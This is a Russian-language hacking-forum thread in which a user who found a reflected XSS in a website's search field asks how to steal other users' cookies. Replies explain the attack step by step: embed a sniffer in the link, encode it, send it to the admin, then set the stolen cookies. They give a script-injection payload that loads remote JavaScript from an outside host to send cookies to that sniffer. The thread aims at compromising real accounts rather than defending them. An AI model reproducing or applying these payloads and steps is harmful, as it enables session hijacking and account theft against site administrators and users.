Xss в поиске...что дальше ?
 

Здрасте :)
Извините если ни там запостил тему,,,,нужна помошь ачатовцев :)

Вобщем есть сайт, там поиск, там есть XSS (активная вроде))

вобщем если в поиске ввести

"><script>alert('antichat.ru')</script>

и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
(тестировал в опере и осле 7)

Теперь вопрос:

Как получить куки пользователей если ксс в поиске :confused:
Это вообще реально ?

Спасибо :)

Это посевная хсс а не активная .

Тоесть если я напишу админу письмо:

Привет
у тебя поиск не работает ( =

Он зайдет в поиск...и как мне его куки своровать ?

Я толко этого не пойму...

http://forum.antichat.ru/thread20140.html

Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.

k0lbasa
Да я эту тему наизусть тебе могу рассказать ( =

Тоесть если у меня будет сайт:

мой_сайт.ру/xss.htm

в xss.htm код
Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня :confused:

Разве такое сработает ?

Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер

это пассивная
хэк

Как же такое сделать если ксс толко в поиске есть :(

Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?

Если что-то в поиске искать, выводится так:

www.site.com/ssearch.php?q=antichat.ru